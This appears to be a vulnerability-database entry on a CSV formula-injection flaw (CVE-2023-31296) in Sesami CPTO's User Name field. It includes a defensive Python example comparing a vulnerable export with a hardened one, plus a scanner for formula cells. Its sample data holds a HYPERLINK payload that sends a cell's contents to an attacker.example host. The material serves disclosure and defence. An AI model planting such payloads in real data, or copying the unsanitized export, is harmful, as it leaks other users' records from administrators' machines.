CVE-2023-31296
Description
CSV injection in Sesami CPTO v6.3.8.6 allows attackers to obtain sensitive info via the User Name field.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
CSV Injection vulnerability (CWE-1236) exists in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718). The User Name field fails to neutralize formula elements, allowing injection of spreadsheet formulas when the exported CSV is opened in software like LibreOffice Calc [1].
Exploitation
An attacker who can set the User Name field (for example at registration or when editing a profile) enters a value that begins with a formula trigger such as `=`, `+`, `-`, `@`, tab, or carriage return. When an administrator later exports the users list as CSV and opens it in a spreadsheet application, the application may interpret that cell as a formula and evaluate it, subject to its import and security settings; the payload therefore runs on the administrator's workstation, not on the CPTO server [1].
Impact
Successful exploitation leads to information disclosure. The injected formula is evaluated inside the administrator's spreadsheet session, so it can read other cells of the export (including other users' records) and, where the application provides functions that fetch external resources, send that content to an attacker-controlled host; what is reachable depends on the spreadsheet software's capabilities and on whether it prompts before contacting external resources [1].
Mitigation
Sesami has fixed the issue in a subsequent version; update CPTO to the latest available version. As a workaround, sanitize CSV output: wrap each cell in double quotes, escape any double quote inside a cell by doubling it, and prefix cells with a single quote so spreadsheet applications treat them as text (at minimum every cell that begins with `=`, `+`, `-`, `@`, tab, or carriage return) [1]. Note that quoting alone is not a defence: CSV quoting only delimits the field, and a quoted cell whose content begins with `=` is still evaluated as a formula once imported, so the single-quote prefix, or rejecting such values when the User Name is submitted, is the part that actually neutralizes the payload.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Sesami / Cash Point & Transport Optimizer
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Improper neutralization of formula elements in a CSV file (CWE-1236) — the User Name field is not sanitized before being written to a CSV export."
Attack vector
An attacker inserts a spreadsheet formula (e.g. starting with `=`, `+`, `-`, or `@`) into the User Name field [ref_id=1]. When an administrator exports the users list to CSV and opens that file in a spreadsheet application such as LibreOffice Calc, the formula executes [ref_id=1]. This can lead to information disclosure or further compromise of the user's machine [CWE-1236].
Affected code
The advisory does not specify particular functions or files. The vulnerability exists in the User Name field of Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718) [ref_id=1].
What the fix does
The advisory states the vendor has fixed the issue and recommends updating CPTO to its current version [ref_id=1]. No patch diff is provided. The advisory recommends sanitizing CSV output by wrapping each cell in double quotes, prepending each cell with a single quote, and escaping double quotes with an additional double quote, or ensuring no cell begins with `=`, `+`, `-`, `@`, tab, or carriage return [ref_id=1].
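Added example (not Sesami's code and not taken from the advisory): a users-list CSV export written the way the Exploitation section describes the vulnerable version behaving, beside the neutralized export that the Mitigation section and "What the fix does" recommend, plus a check that scans an export for cells a spreadsheet importer would evaluate as formulas. The user records, the column names and the HYPERLINK payload are constructed for illustration; the real CPTO export format is not public.

```python
"""CSV injection (CWE-1236) in a users-list export: vulnerable writer beside
the hardened one, plus a check that scans an export for formula-leading cells.

Added example; not Sesami code. The users list, column names and payload are
constructed here for illustration.
"""
import csv
import io

# Characters the advisory lists as formula triggers when a CSV is opened in a
# spreadsheet application: =, +, -, @, tab, carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

COLUMNS = ("id", "username", "role")

# Constructed sample: the third user supplied a formula as their User Name.
# The HYPERLINK payload sends the contents of cell A2 to an attacker-controlled
# host when clicked; it stands in for whatever an attacker submits.
SAMPLE_USERS = [
    {"id": 1, "username": "alice", "role": "admin"},
    {"id": 2, "username": 'bob "the builder"', "role": "operator"},
    {"id": 3, "username": '=HYPERLINK("https://attacker.example/?d="&A2,"open")',
     "role": "user"},
    {"id": 4, "username": "-1+1", "role": "user"},
]


def export_users_vulnerable(users):
    """Write user fields verbatim: the behaviour the advisory describes for
    CPTO 6.3.8.6 (assumed shape of the export; the real code is not public).
    csv.writer quotes fields containing commas or quotes, but a quoted cell
    that starts with '=' is still a formula once a spreadsheet imports it."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(COLUMNS)
    for user in users:
        writer.writerow([user[c] for c in COLUMNS])
    return buf.getvalue()


def neutralize_cell(value):
    """Prefix a cell that would start a formula with a single quote so the
    spreadsheet treats it as text. Wrapping in double quotes and doubling
    embedded double quotes is done by the writer (QUOTE_ALL; doublequote=True
    is the csv module default)."""
    text = str(value)
    if text[:1] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_users_hardened(users):
    """Same export with the advisory's workaround applied to every cell."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(COLUMNS)
    for user in users:
        writer.writerow([neutralize_cell(user[c]) for c in COLUMNS])
    return buf.getvalue()


def parse_export(csv_text):
    """Parse an export back into rows, i.e. the cell values a spreadsheet
    importer would see after CSV quoting has been stripped."""
    return list(csv.reader(io.StringIO(csv_text)))


def first_unsafe_cell(csv_text):
    """Return the first parsed cell that still begins with a formula trigger as
    (row, column, value), or None. Usable as a regression check on the export
    path: it must return None for every export the application produces."""
    for row_index, row in enumerate(parse_export(csv_text)):
        for col_index, cell in enumerate(row):
            if cell[:1] in FORMULA_TRIGGERS:
                return (row_index, col_index, cell)
    return None


if __name__ == "__main__":
    vulnerable = export_users_vulnerable(SAMPLE_USERS)
    hardened = export_users_hardened(SAMPLE_USERS)
    print("vulnerable export:\n" + vulnerable)
    print("first unsafe cell:", first_unsafe_cell(vulnerable))
    print("hardened export:\n" + hardened)
    print("first unsafe cell:", first_unsafe_cell(hardened))
```

Two points worth noticing when running it. The vulnerable export already quotes the payload row, because the payload contains commas and double quotes, yet `first_unsafe_cell` still flags it: quoting is transparent to the importer, so only the single-quote prefix changes what the spreadsheet evaluates. And the prefix is applied to any value starting with a trigger, which also catches legitimate data such as negative numbers ("-1+1" above); that is the trade-off the advisory's workaround accepts, and a reason to also reject such values when the User Name is submitted rather than relying on export-time escaping alone.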
Preconditions
- config: An administrator must export the users list to CSV and open it in a spreadsheet application (e.g. LibreOffice Calc)
- input: The attacker must be able to supply input to the User Name field (e.g. via user registration or profile update)
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.